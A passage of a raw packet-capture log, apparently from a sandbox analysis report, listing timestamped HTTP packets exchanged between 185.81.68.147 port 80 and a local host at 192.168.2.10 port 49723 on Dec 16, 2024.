                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.996496916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.996645927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.996747017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.997355938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.997472048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.997513056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.998255968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.998322964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.998409986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.999192953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.999284983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.999372959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.999984980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.000145912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.000231028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.000880003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.000967979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.001055002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.001792908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.001853943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.001939058 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.002625942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.002722979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.002811909 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.003545046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.003699064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.003783941 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.004359007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.004482985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.004570007 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.005264044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.005367041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.005480051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.006166935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.006247997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.006289959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.007005930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.007163048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.007211924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.007862091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.007972956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.008064985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.008801937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.008888006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.008980036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.009614944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.009721994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.009807110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.010509014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.010689020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.010775089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.011388063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.011497021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.011580944 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.012267113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.012376070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.012459993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.013147116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.013252020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.013304949 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.014060974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.014193058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.014241934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.014918089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.015048027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.015094042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.015774965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.015885115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.015927076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.016658068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.016696930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.016791105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.017544985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.017725945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.017769098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.018482924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.018543959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.018593073 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.019321918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.019486904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.019566059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.020175934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.020292044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.020339012 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.021045923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.021320105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.021363974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.021977901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.022066116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.022106886 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.022794008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.022891998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.022933006 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.023683071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.023729086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.023814917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.024584055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.024650097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.024689913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.025460958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.025521994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.025562048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.026361942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.026439905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.026482105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.027175903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.027215958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.027262926 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.028057098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.028161049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.028204918 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.028959036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.029026985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.029068947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.029844046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.029920101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.029968023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.030728102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.030796051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.030842066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.031562090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.031616926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.031651020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.032418013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.040179968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.040201902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.040271044 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.040493965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.040539026 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.040585041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.041470051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.041524887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.041531086 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.042256117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.042331934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.042382956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.043118954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.043195009 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.043267012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.043999910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.044068098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.044138908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.044898987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.044955969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.045013905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.090286970 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.184700012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.184717894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.184909105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.185090065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.185102940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.185167074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.185945034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.185956001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.186270952 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.186739922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.186753035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.186877966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.187668085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.187680960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.187777042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.188472033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.188545942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.188631058 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.189407110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.189419031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.189519882 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.190306902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.190320015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.190416098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.191365957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.191709042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.191808939 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.192153931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.192168951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.192262888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.193011999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.193681955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.193742037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.193780899 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.193881989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.193921089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.194607973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.194705963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.194792032 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.195548058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.195560932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.195661068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.196527004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.196604013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.196683884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.197345972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.197360992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.197465897 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.198256016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.198327065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.198411942 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.198976040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.199352026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.199439049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.199830055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.200046062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.200138092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.200758934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.200803041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.200845957 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.201703072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.201718092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.201766014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.202467918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.202812910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.202861071 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.203392982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.203475952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.203521013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.204281092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.204581976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.204632044 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.205107927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.205352068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.205399990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.205938101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.206155062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.206198931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.206928015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.206940889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.207034111 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.207772970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.207834959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.207881927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.208745956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.208759069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.208842993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.209486008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.209968090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.210067987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.210637093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.210649014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.210762024 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.211340904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.211353064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.211468935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.212218046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.212232113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.212336063 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.213001966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.213116884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.213201046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.213893890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.214344025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.214431047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.214783907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.214921951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.215008020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.215630054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.216222048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.216300964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.216480017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.216628075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.216701984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.217453957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.217561007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.217637062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.218362093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.218374968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.218487978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.219180107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.219368935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.219423056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.219991922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.220088005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.220149994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.220958948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.220973015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.221029997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.221852064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.221865892 CET8049723185.81.68.147192.168.2.10
